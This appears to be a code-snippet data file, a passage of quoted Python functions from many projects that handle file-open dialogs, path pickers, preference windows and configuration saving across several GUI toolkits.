Widgets:\n self.paneview = PanedWindow(\n self.dialog,\n sashwidth=7,\n bg=\"#cccccc\",\n bd=0,\n )\n\n self.left_pane = PanedWindow(self.paneview)\n self.right_pane = PanedWindow(self.paneview)\n self.paneview.add(self.left_pane)\n self.paneview.add(self.right_pane)\n\n self.treeview_x_scrollbar=Scrollbar(self.left_pane, orient=\"horizontal\")\n self.treeview_y_scrollbar=Scrollbar(self.left_pane, orient=\"vertical\")\n self.list_box_x_scrollbar=Scrollbar(self.right_pane, orient=\"horizontal\")\n self.list_box_y_scrollbar=Scrollbar(self.right_pane, orient=\"vertical\")\n \n # tstyle = Style().configure(\".\", )\n\n self.treeview=Treeview(\n self.left_pane,\n xscrollcommand=self.treeview_x_scrollbar.set,\n yscrollcommand=self.treeview_y_scrollbar.set,\n show=\"tree\",\n selectmode=\"browse\",\n # style=tstyle\n )\n\n\n self.list_box=Listbox(\n self.right_pane,\n xscrollcommand=self.list_box_x_scrollbar.set,\n yscrollcommand=self.list_box_y_scrollbar.set,\n width=34,\n highlightthickness=0,\n bd=2,\n relief=\"ridge\"\n )\n\n if self.multiselect:\n self.list_box.config(selectmode=\"extended\")\n else:\n self.list_box.config(selectmode=\"browse\")\n\n self.cancel_button = Button(\n self.left_pane,\n text=\"Cancel\",\n command=self.cancel\n )\n\n self.submit_button = Button(\n self.right_pane,\n text=\"Submit\",\n command=self.submit\n )\n\n self.treeview_x_scrollbar.config(command=self.treeview.xview)\n self.treeview_y_scrollbar.config(command=self.treeview.yview)\n self.list_box_x_scrollbar.config(command=self.list_box.xview)\n self.list_box_y_scrollbar.config(command=self.list_box.yview)\n \n #Layout:\n self.dialog.rowconfigure(0, weight=1)\n self.dialog.columnconfigure(0, weight=1)\n\n self.left_pane.grid_rowconfigure(0, weight=1)\n self.left_pane.grid_columnconfigure(0, weight=1)\n self.right_pane.grid_rowconfigure(0, weight=1)\n self.right_pane.grid_columnconfigure(0, weight=1)\n\n self.paneview.paneconfigure(\n self.left_pane,\n minsize=100,\n #Start off w/ the sash centered in the GUI:\n width=(self.dialog.winfo_width() / 2) - \n ceil((self.paneview.cget(\"sashwidth\") * 1.5)),\n )\n self.paneview.paneconfigure(self.right_pane, minsize=100)\n\n self.paneview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n\n self.treeview.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.treeview_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.treeview_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.list_box.grid(\n row=0,\n column=0,\n sticky=\"nsew\"\n )\n self.list_box_y_scrollbar.grid(\n row=0,\n column=1,\n sticky=\"ns\"\n )\n self.list_box_x_scrollbar.grid(\n row=1,\n column=0,\n columnspan=2,\n sticky=\"ew\"\n )\n\n self.cancel_button.grid(\n row=2,\n column=0,\n sticky=\"w\",\n padx=10, \n pady=10\n )\n self.submit_button.grid(\n row=2,\n column=0,\n columnspan=2,\n sticky=\"e\",\n padx=10,\n pady=10\n )\n \n #Bindings, Protocols, & Misc:\n self.dialog.bind(\"<Control-w>\", self.cancel)\n self.treeview.bind(\"<<TreeviewSelect>>\", self.treeview_select)\n self.treeview.bind(\"<Double-Button-1>\", self.dialog_populate)\n self.treeview.bind(\"<Return>\", self.dialog_populate)\n self.treeview.bind(\"<Right>\", self.dialog_populate)\n self.list_box.bind(\"<<ListboxSelect>>\", self.list_box_select)\n self.list_box.bind(\"<Return>\", self.submit)\n self.dialog.protocol(\"WM_DELETE_WINDOW\", self.cancel)\n\n self.dialog_selection = deque()\n self.selection_paths = deque()\n\n for disk in self.get_disks():\n self.treeview.insert(\n \"\",\n index=\"end\",\n text=disk,\n image=self.disk_icon,\n )\n\n self.dialog.focus()", "def system_properties(self):\r\n return dict(self._get_system_properties(self.java))", "def readInConfigFileDlg( self ):\n pass", "def saveInConfigFileDlg( self ):\n pass", "def init_conf_windows(settings={}):\n if os.name == 'nt':\n original_settings = conf.settings\n conf.settings = conf.Config(conf.FIXED_SETTINGS, conf.ADJUSTABLE_SETTINGS)\n conf.settings.installation_id = conf.settings.get_installation_id()\n conf.settings.update(settings)", "def onLoad (self):\n #productive #onButton\n profprint()\n self.fileDialog = qt.QFileDialog(self.parent)\n self.fileDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\",\"Config\"))\n self.fileDialog.options = self.fileDialog.DontUseNativeDialog\n self.fileDialog.acceptMode = self.fileDialog.AcceptOpen\n self.fileDialog.defaultSuffix = \"cfg\"\n self.fileDialog.setNameFilter(\"Configuration File (*.cfg)\")\n self.fileDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\n self.fileDialog.show()", "def checkOS():\n\tglobal fileSeperator\n\tif sys.platform=='win32':\n\t\tprint \"System identified as Windows.\"\n\t\tfileSeperator = \"\\\\\"\n\telse:\n\t\tprint \"System identified as MacOSX.\"\n\t\tfileSeperator = \"/\"", "def onLoad (self):\r\n # productive #onButton\r\n profprint()\r\n self.dirDialog = qt.QFileDialog(self.parent)\r\n self.dirDialog.setDirectory(slicer.modules.needlefinder.path.replace(\"NeedleFinder.py\", \"Config\"))\r\n self.dirDialog.options = self.dirDialog.DontUseNativeDialog\r\n self.dirDialog.acceptMode = self.dirDialog.AcceptOpen\r\n self.dirDialog.defaultSuffix = \"cfg\"\r\n self.dirDialog.setNameFilter(\"Configuration File (*.cfg)\")\r\n self.dirDialog.connect(\"fileSelected(QString)\", self.onLoadFileSelected)\r\n self.dirDialog.show()", "def select_app():\n panel = Cocoa.NSOpenPanel.openPanel()\n panel.setCanChooseFiles_(True)\n panel.setCanChooseDirectories_(True)\n panel.setResolvesAliases_(True)\n\n if(panel.runModal() == Cocoa.NSOKButton):\n pathArray = panel.filenames()\n path = pathlib.Path(pathArray[0])\n\n plistPath = path /'Contents'/'Info.plist'\n infoFile = plistPath\n\n try:\n appSize = subprocess.check_output(['du', '-shg', str(path)]).split()[0].decode('utf-8')\n n.views['appSize'].setStringValue_(str(appSize))\n except Exception as err:\n print(err)\n\n n.views['appLocation'].setStringValue_(str(path))\n\n try:\n plist = str(infoFile)\n with open(plist, 'rb') as f:\n info = plistlib.load(f)\n\n if 'CFBundleName' in info:\n global collectedName\n collectedName = info['CFBundleName']\n n.views['appName'].setStringValue_(collectedName)\n else:\n n.views['appName'].setStringValue_('')\n\n if 'CFBundleShortVersionString' in info:\n global collectedVersion\n collectedVersion= info['CFBundleShortVersionString']\n n.views['appVersion'].setStringValue_(collectedVersion)\n else:\n n.views['appVersion'].setStringValue_('')\n\n if 'CFBundleIconFile' in info:\n global collectedIcon\n collectedIcon = pathlib.Path(plist).parent / 'Resources' / info['CFBundleIconFile']\n n.views['appIcon'].setStringValue_(str(collectedIcon))\n else:\n n.views['appIcon'].setStringValue_('')\n\n if 'CFBundleIdentifier' in info:\n global collectedIdentifier\n collectedIdentifier = info['CFBundleIdentifier']\n n.views['appIdentifier'].setStringValue_(collectedIdentifier)\n else:\n n.views['appIdentifier'].setStringValue_('')\n\n except Exception as err:\n print('An Error Occured: {0}'.format(err))", "def askopenfilename(self, *args, **kw):\n\n self.tk.tk_setPalette('#888888')\n save_update_step = self.update_step\n self.update_step = 0\n\n filename = tkinter.filedialog.askopenfilename(parent=self.tk)\n if filename:\n self.readwtf(filename)\n self.redraw_letters()\n self.update_step = save_update_step\n self.tk.tk_setPalette('#000000')", "def configure(prompt_list):\n darwin_vers = int(os.uname()[2].split('.')[0])\n edited_prefs = {}\n for (key, prompt) in prompt_list:\n newvalue = get_input_with_default('%15s: ' % prompt, pref(key))\n if darwin_vers == 10:\n # old behavior in SL: hitting return gives you an empty string,\n # and means accept the default value.\n edited_prefs[key] = newvalue or pref(key) or ''\n else:\n # just use the edited value as-is\n edited_prefs[key] = newvalue\n\n if FOUNDATION_SUPPORT:\n for key, value in edited_prefs.items():\n try:\n CFPreferencesSetAppValue(key, value, BUNDLE_ID)\n except BaseException:\n print('Could not save configuration!', file=sys.stderr)\n raise ConfigurationSaveError\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n CFPreferencesSetAppValue('repo_path', None, BUNDLE_ID)\n CFPreferencesAppSynchronize(BUNDLE_ID)\n\n else:\n try:\n existing_prefs = readPlist(PREFSPATH)\n existing_prefs.update(edited_prefs)\n # remove repo_path if it exists since we don't use that\n # any longer (except for backwards compatibility) and we don't\n # want it getting out of sync with the repo_url\n if 'repo_path' in existing_prefs:\n del existing_prefs['repo_path']\n writePlist(existing_prefs, PREFSPATH)\n except (IOError, OSError, ExpatError):\n print('Could not save configuration to %s' % PREFSPATH,\n file=sys.stderr)\n raise ConfigurationSaveError", "def __call__(self):\n\n (width_offset, height_offset)=self.get_offset(self.dialog)\n self.dialog.geometry(f\"+{width_offset}+{height_offset}\")\n self.dialog.update_idletasks()\n self.dialog.deiconify()\n\n self.dialog.wait_window()\n\n for i, path in enumerate(self.dialog_selection):\n if self.unix_delimiter:\n self.dialog_selection[i] = sub(\"\\\\\\\\\", \"/\", path)\n else:\n self.dialog_selection[i] = sub(\"/\", \"\\\\\\\\\", path)\n\n\n if self.stdout:\n [print(item) for item in self.dialog_selection]\n\n return list(self.dialog_selection)", "def action(self):\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\" or self.filename is None:\n return\n\n dirname = fs.path.forcedir(\".\")\n if self.wparm is not None:\n dirname = self.selected_dir\n if dirname.startswith(self.active_url):\n filename = \"{}{}\".format(fs.path.forcedir(self.active_url), self.filename)\n else:\n # We can't use fs.path.join and also not fs.path.abspath because of protocol url\n filename = \"{}{}{}\".format(\n fs.path.forcedir(self.active_url),\n fs.path.forcedir(dirname),\n self.filename,\n )\n filename = filename.replace(fs.path.forcedir(\".\"), \"\")\n if self.show_save_action and not self.show_dirs_only:\n self.save_settings()\n self.filename = self.ui_SelectedName.text()\n if self.filename == \"\":\n return\n info = self.get_info(fs.path.split(filename)[1], namespaces=None)\n if info is not None and info.is_dir:\n sel = QtWidgets.QMessageBox.warning(\n self,\n \"Warning\",\n \"You can't create a file with this name: {0}\".format(self.filename),\n QtWidgets.QMessageBox.No,\n )\n elif info is not None and info.is_file:\n sel = QtWidgets.QMessageBox.question(\n self,\n \"Replace Filename\",\n \"This will replace the filename: {0}. Continue?\".format(\n self.filename\n ),\n QtWidgets.QMessageBox.Yes | QtWidgets.QMessageBox.No,\n )\n if sel == QtWidgets.QMessageBox.Yes:\n self.filename = filename\n self.close()\n else:\n pass\n else:\n self.filename = filename\n self.close()\n else:\n self.filename = filename\n self.close()", "def on_open_file(self):\n return tkFileDialog.askopenfilename(\n filetypes=[('default', '*.txt'), ('All files', '*.*')])", "def askOpen(parent,title='',defaultDir='',defaultFile='',wildcard='',style=wx.OPEN):\r\n defaultDir,defaultFile = [GPath(x).s for x in (defaultDir,defaultFile)]\r\n dialog = wx.FileDialog(parent,title,defaultDir,defaultFile,wildcard, style )\r\n if dialog.ShowModal() != wx.ID_OK: \r\n result = False\r\n elif style & wx.MULTIPLE:\r\n result = map(GPath,dialog.GetPaths())\r\n else:\r\n result = GPath(dialog.GetPath())\r\n dialog.Destroy()\r\n return result", "def showpreferencefiles():\n process = subprocess.check_output(['ls', os.path.dirname(os.path.abspath(__file__))+'/Preferences'])\n print()\n for eachFile in process.decode('utf-8').split('\\n'):\n if '__' not in eachFile and '~' not in eachFile:\n print(' {}'.format(eachFile))", "def mv_properties(self):\n f = '/coretemp/coretemp.properties'\n b = os.getcwd()\n shutil.copy2(b+f, '/etc/')", "def browse(self):\n\n self.filepath.set(fd.askopenfilename(initialdir=self._initaldir,\n filetypes=self._filetypes))", "def set(self):\n \n ffmpeg_installed = misc.askquestion(DialogTitle='FFMPEG Check',\n Question='Is FFMPEG installed?')\n \n if ffmpeg_installed:\n ffmpeg_dir = misc.get_dir(DialogTitle='Please select the directory where FFMPEG (binary) is installed:')\n \n if sys.platform=='win32':\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg.exe')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay.exe')\n else:\n self.ffmpeg = os.path.join(ffmpeg_dir, 'ffmpeg')\n self.ffplay = os.path.join(ffmpeg_dir, 'ffplay')\n \n if not os.path.exists(self.ffmpeg):\n print('Sorry, {0} does not exist!'.format(self.ffmpeg))\n return\n \n if not os.path.exists(self.ffplay):\n print('Sorry, {0} does not exist!'.format(self.ffplay))\n return\n \n else:\n self.ffmpeg = None\n self.ffplay = None\n \n # Save them to the default config file\n info = {'ffmpeg':self.ffmpeg, 'ffplay': self.ffplay}\n try:\n with open(self.config_file, 'w') as outFile:\n json.dump(info, outFile)\n print('Config information written to {0}'.format(os.path.abspath(self.config_file)))\n except PermissionError as e:\n curDir = os.path.abspath(os.curdir)\n print('Current directory: {0}'.format(curDir))\n print('Error: {0}'.format(e))\n \n return", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def on_coding_standard_file_browse(self, *args):\n file = GPS.MDI.file_selector()\n if file.path != \"\":\n self.fileEntry.set_text(file.path)", "def readConfigFileDlg( self ):\n fileName = QtGui.QFileDialog.getOpenFileName( self, \"Read application config file\", self.rsrc.lastFolder, \"Config files (*.cfg)\" )\n if ( fileName ):\n self.readConfigFile( fileName )\n path, fName = os.path.split( str( fileName ) )\n self.rsrc.lastFolder = path", "def preferences(self):\n from dialogs import preferencesDialog\n prefs=preferencesDialog.Create(self,-1,'')\n prefs.ShowModal()", "def alter_subprocess_kwargs_by_platform(**kwargs):\n kwargs.setdefault('close_fds', os.name == 'posix')\n if os.name == 'nt':\n CONSOLE_CREATION_FLAGS = 0 # Default value\n # See: https://msdn.microsoft.com/en-us/library/windows/desktop/ms684863%28v=vs.85%29.aspx\n CREATE_NO_WINDOW = 0x08000000\n # We \"or\" them together\n CONSOLE_CREATION_FLAGS |= CREATE_NO_WINDOW\n kwargs.setdefault('creationflags', CONSOLE_CREATION_FLAGS)\n return kwargs", "def askopenfilename():\n\n file_opt = options = {}\n options['defaultextension'] = '.*'\n options['initialdir'] = 'User\\\\'\n options['initialfile'] = ''\n options['parent'] = root\n options['title'] = 'choose file'\n options['multiple'] = 1\n\n # get filename\n filename = tk.filedialog.askopenfilename(**file_opt)\n\n if filename:\n self.sourcefile = filename\n if len(filename) is 1:\n file_path_var.set(filename)\n else:\n file_path_var.set(\n \"Multiple files, including {}\".format(filename[0]))", "def __showPathPickerDialog(self):\n if self.__mode == E5PathPickerModes.NoMode:\n return\n \n if self.__mode == E5PathPickerModes.CustomMode:\n self.pickerButtonClicked.emit()\n return\n \n self.aboutToShowPathPickerDialog.emit()\n \n windowTitle = self.__windowTitle\n if not windowTitle:\n if self.__mode == E5PathPickerModes.OpenFileMode:\n windowTitle = self.tr(\"Choose a file to open\")\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n windowTitle = self.tr(\"Choose files to open\")\n elif self.__mode in [\n E5PathPickerModes.SaveFileMode,\n E5PathPickerModes.SaveFileEnsureExtensionMode,\n E5PathPickerModes.SaveFileOverwriteMode]:\n windowTitle = self.tr(\"Choose a file to save\")\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n windowTitle = self.tr(\"Choose a directory\")\n \n directory = self._editorText()\n if not directory and self.__defaultDirectory:\n directory = self.__defaultDirectory\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n directory = os.path.expanduser(directory.split(\";\")[0])\n else:\n directory = os.path.expanduser(directory)\n if not os.path.isabs(directory) and self.__defaultDirectory:\n directory = os.path.join(self.__defaultDirectory, directory)\n directory = Utilities.fromNativeSeparators(directory)\n \n if self.__mode == E5PathPickerModes.OpenFileMode:\n path = E5FileDialog.getOpenFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.OpenFilesMode:\n paths = E5FileDialog.getOpenFileNames(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = \";\".join([Utilities.toNativeSeparators(path)\n for path in paths])\n elif self.__mode == E5PathPickerModes.SaveFileMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.SaveFileEnsureExtensionMode:\n path, selectedFilter = E5FileDialog.getSaveFileNameAndFilter(\n self,\n windowTitle,\n directory,\n self.__filters,\n None,\n E5FileDialog.Options(E5FileDialog.DontConfirmOverwrite))\n path = Utilities.toNativeSeparators(path)\n if path:\n ext = QFileInfo(path).suffix()\n if not ext:\n ex = selectedFilter.split(\"(*\")[1].split(\")\")[0]\n if ex:\n path += ex\n elif self.__mode == E5PathPickerModes.SaveFileOverwriteMode:\n path = E5FileDialog.getSaveFileName(\n self,\n windowTitle,\n directory,\n self.__filters)\n path = Utilities.toNativeSeparators(path)\n elif self.__mode == E5PathPickerModes.DirectoryMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.ShowDirsOnly))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n elif self.__mode == E5PathPickerModes.DirectoryShowFilesMode:\n path = E5FileDialog.getExistingDirectory(\n self,\n windowTitle,\n directory,\n E5FileDialog.Options(E5FileDialog.DontUseNativeDialog))\n path = Utilities.toNativeSeparators(path)\n while path.endswith(os.sep):\n path = path[:-1]\n \n if path:\n self._setEditorText(path)\n self.pathSelected.emit(path)", "def FileDialog( message, wildcard, style, defaultDir=os.getcwd(), defaultFile='' ):\n dlg = wx.FileDialog( wx.GetApp().GetTopWindow(), message, defaultDir, defaultFile, wildcard, style )\n if dlg.ShowModal() == wx.ID_OK:\n if style & wx.MULTIPLE:\n result = dlg.GetPaths()\n else:\n result = dlg.GetPath()\n else:\n result = False\n dlg.Destroy()\n \n return result", "def set_working_dir(self):\n self.working_dir = select_dir(os.getcwd())\n if self.working_dir is not None:\n self.set_work_dir_button.setStyleSheet(\"Text-align:left\")\n self.set_work_dir_button.setText(self.working_dir)\n else:\n self.set_work_dir_button.setText('')\n msg_window('please select valid working directory')\n return", "def init_settings(self):\n if not os.path.exists(self.settingsFilePath):\n settings_dir = os.getenv(\"APPDATA\") + \"\\\\\" + qApp.applicationName()\n if not os.path.exists(settings_dir):\n os.makedirs(settings_dir)\n setting_path = \"\"\n if getattr(sys, 'frozen', False):\n setting_path = os.path.dirname(sys.executable)\n elif __file__:\n setting_path = os.path.dirname(__file__)\n shutil.copyfile(os.path.join(setting_path, \"resources\\eksettings.ini\"), self.settingsFilePath)\n return", "def menu_Open():\n asdf = tkFileDialog.askopenfilename()\n print(asdf)", "def setup():\n setFormat()\n setFilename()\n setScreenMode()", "def files_manage(self):\n sender = self.sender()\n\n if sender == self.mapsDirectoryButton:\n path_to_map, _ = QFileDialog.getOpenFileName(self,\n caption=\"Открыть\",\n directory=\"/\",\n filter=\"Image files (*.jpg *.JPG *.png *.jpeg *.bmp\")\n\n if path_to_map:\n self.mapsDirectoryLine.setText(path_to_map)\n\n elif sender == self.troopsDirectoryButton:\n directory = QFileDialog.getExistingDirectory(self,\n caption=\"Открыть\",\n directory=\"/\")\n\n if directory:\n self.troopsDirectoryLine.setText(directory)", "def test_os_system(self):\n self.assertEqual(self.settings.OS_SYSTEM, platform.system())", "def init_filemenu(self):\n self.menubar[\"filemenu\"] = Menu(self.menubar[\"menubar\"], tearoff=0)\n self.menubar[\"filemenu\"].add_command(label=\"New\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Open\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Save\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Save as...\", command=todo)\n self.menubar[\"filemenu\"].add_command(label=\"Close\", command=todo)\n self.menubar[\"filemenu\"].add_separator()\n self.menubar[\"menubar\"].add_cascade(\n label=\"File\", menu=self.menubar[\"filemenu\"])", "def configure_custom_terminal(new_path):\n lnp.userconfig['terminal'] = new_path\n lnp.userconfig.save_data()", "def change_exteditor(self):\r\n path, valid = QInputDialog.getText(self, self.tr('External editor'),\r\n self.tr('External editor executable path:'),\r\n QLineEdit.Normal,\r\n CONF.get(self.ID, 'external_editor/path'))\r\n if valid:\r\n CONF.set(self.ID, 'external_editor/path', unicode(path))", "def _restore_options(self):\r\n fn = self._opt_file_name()\r\n if os.path.exists(fn):\r\n try:\r\n opt = pickle.load(open(fn, \"r\"))\r\n self.tb_pragma.SetValue(opt[\"topic\"])\r\n self.tb_package.SetValue(opt[\"package\"])\r\n self.tb_file_header.SetValue(opt[\"header\"])\r\n self.tb_target_folder.SetValue(opt[\"target_folder\"])\r\n self.tb_encoding.SetValue(opt[\"encoding\"])\r\n except Exception as ex:\r\n print(\"Error durring restore default options\")\r\n print(ex)", "def __init__(self):\r\n\r\n super().__init__() # Loading the Tk window instance\r\n\r\n self.title(\"Song Storage\") # Naming the root window\r\n self.resizable(False, False) # Disabling resizing of the root window\r\n self.iconphoto(True, PhotoImage(file=\"Resources/Icons/AppIcon.png\")) # Loading the icon of the application\r\n\r\n global config_var # Using the global variable that reads and modifies the configuration file\r\n\r\n # Application's GUI was invoked from a CLI instance; updating the configuration file variable\r\n if config_var['RUN-MODE']['run_mode'] == \"1\":\r\n config_var.set('RUN-MODE', 'run_mode', \"0\")\r\n\r\n try:\r\n with open('config.ini', 'w') as configfile_gui:\r\n config_var.write(configfile_gui) # Writing the changes to the configuration file\r\n configfile_gui.close()\r\n\r\n except IOError:\r\n messagebox.showerror(\"Writing to file failed\", \"Failed to write new value to the configuration file.\"\r\n \" Please make sure no other applications are interacting with the configuration \"\r\n \"file and that \\\"config.ini\\\" is located in the folder of the application.\")\r\n\r\n # Application is running in debugging mode\r\n if config_var['RUN-MODE']['run_mode'] == \"2\":\r\n print(\"\\nError: Failed to write new value to the configuration file. Please make sure no other \"\r\n \"applications are interacting with the configuration file and that \\\"config.ini\\\" is located \"\r\n \"in the folder of the application.\")\r\n\r\n # The variable that shows the current run-mode of the application\r\n # It is used by the radiobuttons in the filemenu\r\n self.gui_menu_var = StringVar(self, config_var['RUN-MODE']['run_mode'])\r\n \r\n \"\"\"Declaring the variables the GUI will use\"\"\"\r\n self.menubar = Menu() # The file menu where the user can specify global settings for the application\r\n self.filemenu = Menu(self.menubar, tearoff=0) # Submenu for the file menu\r\n self.runmode_menu = Menu(self.filemenu, tearoff=0) # Submenu showing the current run-mode of the application\r\n \r\n self.folder_frame = Frame() # The frame that will display the current media folder\r\n\r\n # The value that stores the current media folder's path as a string\r\n self.var = StringVar(self, \"Please choose the folder where you'd like to store your media:\")\r\n\r\n # The label that will display the current media folder\r\n self.media_folder_label = Label(self.folder_frame, textvariable=self.var)\r\n\r\n # This button will prompt the user to select a media folder\r\n self.folder_button = Button(self.folder_frame, text=\"Browse...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The button that allows the user to change the currently selected media folder\r\n self.change_folder_button = ttk.Button(self.folder_frame, text=\"Change...\",\r\n command=lambda: folder_selector(None, self))\r\n\r\n # The frame that will display all the media content available inside the media folder\r\n self.media_frame = Frame()\r\n self.canvas = Canvas()\r\n\r\n self.path_frame_parent = Frame(self.media_frame, relief=GROOVE, width=500, height=100, bd=1)\r\n\r\n # Variables related to the search frame of the application\r\n self.search_frame = Frame()\r\n\r\n self.back_image = PhotoImage(file=\"Resources/Icons/Back Icon #2.png\")\r\n self.back_button = Button(self.search_frame, image=self.back_image, bg=\"#ffffff\", command=self.display_media)\r\n\r\n self.search_entry = ttk.Entry(self.search_frame, width=50)\r\n self.search_button = ttk.Button(self.search_frame, text=\"Search\",\r\n command=lambda entry=self.search_entry: self.search(self.search_entry))\r\n # self.advanced_search_button = ttk.Button(self.search_frame, text=\"Advanced Search...\")\r\n\r\n self.header = Label(self.media_frame, text=\"Available media:\")\r\n\r\n # This label will display when the user attempts to add an already-existent media file\r\n self.already_exists = Label(self.folder_frame, text=\"\")\r\n\r\n self.button_frame = Frame()\r\n\r\n # The button that allows the user to add media files from other sources\r\n self.add_music_button = ttk.Button(self.button_frame, text=\"Add Media...\", command=self.add_media_dialog)\r\n\r\n # Savelist-related variables\r\n self.create_savelist_button = ttk.Button(self.button_frame, text=\"Create Savelist...\",\r\n command=self.create_savelist)\r\n\r\n self.quit_button = ttk.Button(self.button_frame, text=\"Exit\", command=self.destroy)\r\n\r\n self.archive_name = StringVar()\r\n self.archive_name.set(\"\")\r\n\r\n # We are storing the length of the longest item in the media list in order to be able to modify the size of the\r\n # scrollable area (if necessary).\r\n self.longest_item_length = 0\r\n\r\n self.library_items = [] # The array storing info for every media file (name, buttons, metadata etc.)\r\n\r\n self.process_widgets()\r\n\r\n self.load_interface()\r\n\r\n self.lift()\r\n\r\n print(\"Graphical user interface loaded.\")", "def fromFile(filename: unicode) -> ghidra.framework.ApplicationProperties:\n ...", "def __init__(self, dialog_title='', dialog_format='',\n start_dir=os.path.expanduser('~/'),\n icon_size=(12, 20), minimal_width=200,\n browse_label='Browse', on_open=None,\n reload_button=True, reload_label='Reload',\n recent_files=None, directory_aliases=None,\n allow_empty=True, empty_file_label='(none)'):\n super().__init__()\n self.dialog_title = dialog_title\n self.dialog_format = dialog_format\n self.start_dir = start_dir\n\n # Recent files should also contain `empty_file_label` so\n # when (none) is selected this is stored in settings.\n self.recent_files = recent_files if recent_files is not None else []\n self.directory_aliases = directory_aliases or {}\n self.allow_empty = allow_empty\n self.file_combo = None\n self.empty_file_label = empty_file_label\n if self.empty_file_label not in self.recent_files \\\n and (self.allow_empty or not self.recent_files):\n self.recent_files.append(self.empty_file_label)\n\n self.check_existence()\n self.on_open.connect(on_open)\n\n layout = QHBoxLayout(self)\n layout.setContentsMargins(0, 0, 0, 0)\n\n if recent_files is not None:\n self.file_combo = QComboBox()\n self.file_combo.setMinimumWidth(minimal_width)\n self.file_combo.activated[int].connect(self.select)\n self.update_combo()\n layout.addWidget(self.file_combo)\n\n self.browse_button = QPushButton(browse_label)\n self.browse_button.setFocusPolicy(Qt.NoFocus)\n self.browse_button.clicked.connect(self.browse)\n self.browse_button.setIcon(self.style()\n .standardIcon(QStyle.SP_DirOpenIcon))\n self.browse_button.setIconSize(QSize(*icon_size))\n self.browse_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n layout.addWidget(self.browse_button)\n\n if reload_button:\n self.reload_button = QPushButton(reload_label)\n self.reload_button.setFocusPolicy(Qt.NoFocus)\n self.reload_button.clicked.connect(self.reload)\n self.reload_button.setIcon(self.style()\n .standardIcon(QStyle.SP_BrowserReload))\n self.reload_button.setSizePolicy(QSizePolicy.Fixed, QSizePolicy.Fixed)\n self.reload_button.setIconSize(QSize(*icon_size))\n layout.addWidget(self.reload_button)", "def __init__(self, file_system, mount_point, path_attributes=None):\n super(FileSystemWinRegistryFileReader, self).__init__()\n self._file_system = file_system\n self._path_resolver = windows_path_resolver.WindowsPathResolver(\n file_system, mount_point)\n\n if path_attributes:\n for attribute_name, attribute_value in iter(path_attributes.items()):\n # TODO: fix the call to this class and make sure only relevant\n # values are passed.\n if attribute_name == u'systemroot':\n self._path_resolver.SetEnvironmentVariable(\n u'SystemRoot', attribute_value)\n\n elif attribute_name == u'userprofile':\n self._path_resolver.SetEnvironmentVariable(\n u'UserProfile', attribute_value)", "def open_preferences(self):\n result = OptionsDialog.get_options(self.settings,\n TcamView.has_dutils())\n\n if result:\n log.info(\"Saving settings\")\n else:\n log.info(\"Settings not saved\")\n\n if self.view:\n self.view.set_settings(self.settings)\n\n self.get_focus()", "def setFile(self, filename): #$NON-NLS-1$\r", "def onPreferences():\n cpp.createWidgets()\n dialog = cpp.dialog()\n dialog.show()", "def FileOpenDialog( message, wildcard, style=0, defaultDir=os.getcwd(), defaultFile='' ):\n style = style | wx.OPEN | wx.CHANGE_DIR\n return FileDialog( message, wildcard, style, defaultDir, defaultFile )", "def browse( self ):\n Tk.Tk().withdraw()\n filename = askopenfilename( initialdir = self.initialdir,\n title = self.title ,\n filetypes = self.filetypes )\n\n if filename == \"\":\n return\n\n self.set_text( filename )\n #rint( f\"get_text = {self.get_text()}\", flush = True )", "def setText(self, path, toNative=True):\n if self.__mode == E5PathPickerModes.OpenFilesMode:\n self._setEditorText(path)\n else:\n if toNative:\n path = Utilities.toNativeSeparators(path)\n self._setEditorText(path)\n if self._completer:\n self._completer.setRootPath(path)", "def browse_file_dialog():\n root = Tkinter.Tk()\n # Make window almost invisible to focus it and ensure directory browser\n # doesn't end up loading in the background behind main window.\n root.withdraw()\n root.overrideredirect(True)\n root.geometry('0x0+0+0')\n root.deiconify()\n root.lift()\n root.focus_force()\n root.update()\n file_path = tkFileDialog.askopenfilename()\n root.destroy()\n if file_path:\n return os.path.normpath(file_path)\n else:\n return file_path", "def setDefaultSettings():\n if PLATFORM == 'Windows':\n font = 'Consolas'\n else:\n font = 'Monospace'\n\n preferenceNode = nuke.toNode('preferences')\n # viewer settings\n preferenceNode['maxPanels'].setValue(5)\n preferenceNode['TextureSize'].setValue('2048x2048')\n preferenceNode['viewer_bg_color_3D'].setValue(1280068863)\n preferenceNode['viewer_fg_color_3D'].setValue(4294967295L)\n preferenceNode['Viewer3DControlEmulation'].setValue('Maya')\n preferenceNode['middleButtonPans'].setValue(False)\n preferenceNode['dot_node_scale'].setValue(1.5)\n\n # script editor settings\n preferenceNode['clearOnSuccess'].setValue(False)\n preferenceNode['echoAllCommands'].setValue(True)\n preferenceNode['ScriptEditorFont'].setValue(font)\n 